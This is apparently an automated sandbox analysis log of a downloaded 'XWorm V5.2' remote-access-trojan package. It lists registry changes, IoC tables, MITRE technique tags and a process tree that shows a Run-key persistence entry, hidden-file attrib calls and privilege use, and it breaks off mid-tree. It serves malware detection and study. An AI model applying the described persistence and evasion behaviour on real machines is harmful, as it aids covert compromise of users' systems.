Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	XWormLoader 5.2 x64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "6"	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	XWormLoader 5.2 x64.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\XWorm V5.2.7z:Zone.Identifier	firefox.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1576	AnyDesk.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3856	AnyDesk.exe
3856	AnyDesk.exe
3856	AnyDesk.exe
3856	AnyDesk.exe
5940	msedge.exe
5940	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
4288	msedge.exe
4288	msedge.exe
5760	msedge.exe
5760	msedge.exe
5892	msedge.exe
5892	msedge.exe
3404	msedge.exe
3404	msedge.exe
4216	msedge.exe
4216	msedge.exe
4356	msedge.exe
4356	msedge.exe
5140	identity_helper.exe
5140	identity_helper.exe
1824	msedge.exe
1824	msedge.exe
2968	msedge.exe
2968	msedge.exe
2968	msedge.exe
1624	msedge.exe
1624	msedge.exe
4216	msedge.exe
4216	msedge.exe
5812	msedge.exe
5812	msedge.exe
3380	msedge.exe
3380	msedge.exe
516	identity_helper.exe
516	identity_helper.exe
4860	XWormLoader 5.2 x64.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4860	XWormLoader 5.2 x64.exe
2320	AnyDesk.exe
1140	XWormLoader 5.2 x64.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 27 IoCs

pid	Process
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
3404	msedge.exe
3404	msedge.exe
3404	msedge.exe
4356	msedge.exe
4356	msedge.exe
4356	msedge.exe
2968	msedge.exe
2968	msedge.exe
2968	msedge.exe
4216	msedge.exe
4216	msedge.exe
4216	msedge.exe
3380	msedge.exe
3380	msedge.exe
3380	msedge.exe
5968	msedge.exe
5968	msedge.exe
5968	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	3856	AnyDesk.exe
Token: 33	2256	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2256	AUDIODG.EXE
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeRestorePrivilege	5584	7zG.exe
Token: 35	5584	7zG.exe
Token: SeSecurityPrivilege	5584	7zG.exe
Token: SeSecurityPrivilege	5584	7zG.exe
Token: SeDebugPrivilege	548	start.exe
Token: SeDebugPrivilege	5612	XWorm V5.2.exe
Token: SeDebugPrivilege	6108	start.exe
Token: SeDebugPrivilege	5600	start.exe
Token: SeDebugPrivilege	5136	XWormLoader 5.2 x32.exe
Token: SeDebugPrivilege	6044	XWorm V5.2.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	532	XWormLoader 5.2 x32.exe
Token: SeDebugPrivilege	4536	XWorm V5.2.exe
Token: SeDebugPrivilege	1084	XWormLoader 5.2 x32.exe
Token: SeDebugPrivilege	5224	XWorm V5.2.exe
Token: SeDebugPrivilege	4976	start.exe
Token: SeDebugPrivilege	4860	XWormLoader 5.2 x64.exe
Token: SeDebugPrivilege	4932	XWormLoader 5.2 x32.exe
Token: SeDebugPrivilege	4836	XWorm V5.2.exe
Token: SeDebugPrivilege	4552	XWorm V5.2.exe
Token: SeDebugPrivilege	1140	XWormLoader 5.2 x64.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
5584	7zG.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
532	XWormLoader 5.2 x32.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
1576	AnyDesk.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
1072	msedge.exe
532	XWormLoader 5.2 x32.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe
5760	msedge.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
2320	AnyDesk.exe
2320	AnyDesk.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
4860	XWormLoader 5.2 x64.exe
1140	XWormLoader 5.2 x64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3228 wrote to memory of 3856	3228	AnyDesk.exe	83
PID 3228 wrote to memory of 3856	3228	AnyDesk.exe	83
PID 3228 wrote to memory of 3856	3228	AnyDesk.exe	83
PID 3228 wrote to memory of 1576	3228	AnyDesk.exe	84
PID 3228 wrote to memory of 1576	3228	AnyDesk.exe	84
PID 3228 wrote to memory of 1576	3228	AnyDesk.exe	84
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 3652 wrote to memory of 4956	3652	firefox.exe	114
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4464	4956	firefox.exe	115
PID 4956 wrote to memory of 4844	4956	firefox.exe	116
PID 4956 wrote to memory of 4844	4956	firefox.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3872	attrib.exe
3784	attrib.exe
208	attrib.exe
5216	attrib.exe

C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
  "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-service
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3856
- - C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
    "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --backend
    3⤵
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2320
- C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe
  "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe" --local-control
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1576

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x508
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5076

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3652
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c91b1d48-50ec-4c5f-937d-7c969693e153} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" gpu
    3⤵
    PID:4464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2440 -parentBuildID 20240401114208 -prefsHandle 2416 -prefMapHandle 2412 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d719d096-4cac-42d4-88b0-03dd41979da3} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" socket
    3⤵
    - Checks processor information in registry
    PID:4844
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3084 -childID 1 -isForBrowser -prefsHandle 2804 -prefMapHandle 3048 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 984 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {689bbf84-9e80-44f4-963a-0b2e393f8446} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:5024
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3936 -childID 2 -isForBrowser -prefsHandle 3928 -prefMapHandle 3924 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 984 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bb0fbec-e423-42f9-b2cd-c207b7c4d6e1} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:1640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4784 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4772 -prefMapHandle 3900 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42478530-20d4-41da-b7e9-91823d0f67bd} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" utility
    3⤵
    - Checks processor information in registry
    PID:5244
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 3 -isForBrowser -prefsHandle 5292 -prefMapHandle 5316 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 984 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72423864-7f4e-4120-a12b-1f557daff38c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:6092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 4 -isForBrowser -prefsHandle 5328 -prefMapHandle 5324 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 984 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec0e87b2-0552-4e4e-aade-e5d528376514} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:6100
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5736 -childID 5 -isForBrowser -prefsHandle 5656 -prefMapHandle 5664 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 984 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {980dd19f-dbcf-40c9-af82-bbeee2dea96f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:6116
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5944 -childID 6 -isForBrowser -prefsHandle 3676 -prefMapHandle 5948 -prefsLen 30981 -prefMapSize 244658 -jsInitHandle 984 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d99900b0-7430-4035-b2f7-db4c45fa500c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:4548
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6136 -childID 7 -isForBrowser -prefsHandle 6160 -prefMapHandle 6168 -prefsLen 30981 -prefMapSize 244658 -jsInitHandle 984 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ee4aafe-883f-494b-bd08-7e8751f8d14d} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:5356

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap26167:80:7zEvent14498
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5584

C:\Users\Admin\Downloads\XWorm V5.2\start.exe
"C:\Users\Admin\Downloads\XWorm V5.2\start.exe"
1⤵
- Adds Run key to start application
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:548
- C:\Windows\system32\attrib.exe
